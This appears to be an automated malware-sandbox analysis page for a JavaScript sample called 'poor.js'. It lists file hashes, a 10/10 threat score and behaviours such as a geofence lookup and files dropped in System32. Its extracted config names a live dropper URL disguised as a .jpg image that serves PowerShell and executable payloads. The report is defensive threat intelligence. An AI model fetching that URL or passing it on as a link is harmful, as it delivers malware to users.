Overview

overview

10

Static

static

1

poor.js

windows7-x64

10

poor.js

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    poor.js

  • Size

    309KB

  • Sample

    230830-pyks9aee8y

  • MD5

    f3dbc8bfa9050a43d27eaf3f9351ecc0

  • SHA1

    b2b93e0ef1868d5304a5c30d501a23fe947167f6

  • SHA256

    a195bd116eb430573008a60b1ff0f24c78dcd2cb83e191d4a5c11d2443c50df8

  • SHA512

    660bf7f7d9936d0f37805847fea99bb406bf40f82f2143db755d0ca0a2fe0cce57b105945388ae6eca0ae5a1a083c762de86e21f753846d50cce3f71930a9e03

  • SSDEEP

    6144:HN0000qN0000HN00004N00002N0000J/iAWS88888VN00003N0000zN00006:HN0000qN0000HN00004N00002N0000uU

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://uploaddeimagens.com.br/images/004/572/679/original/rump_js_link64_startup.jpg?1691689535
exe.dropper

https://uploaddeimagens.com.br/images/004/572/679/original/rump_js_link64_startup.jpg?1691689535

Targets

    • Target

      poor.js

    • Size

      309KB

    • MD5

      f3dbc8bfa9050a43d27eaf3f9351ecc0

    • SHA1

      b2b93e0ef1868d5304a5c30d501a23fe947167f6

    • SHA256

      a195bd116eb430573008a60b1ff0f24c78dcd2cb83e191d4a5c11d2443c50df8

    • SHA512

      660bf7f7d9936d0f37805847fea99bb406bf40f82f2143db755d0ca0a2fe0cce57b105945388ae6eca0ae5a1a083c762de86e21f753846d50cce3f71930a9e03

    • SSDEEP

      6144:HN0000qN0000HN00004N00002N0000J/iAWS88888VN00003N0000zN00006:HN0000qN0000HN00004N00002N0000uU

    Score
    10/10

    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Drops file in System32 directory

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks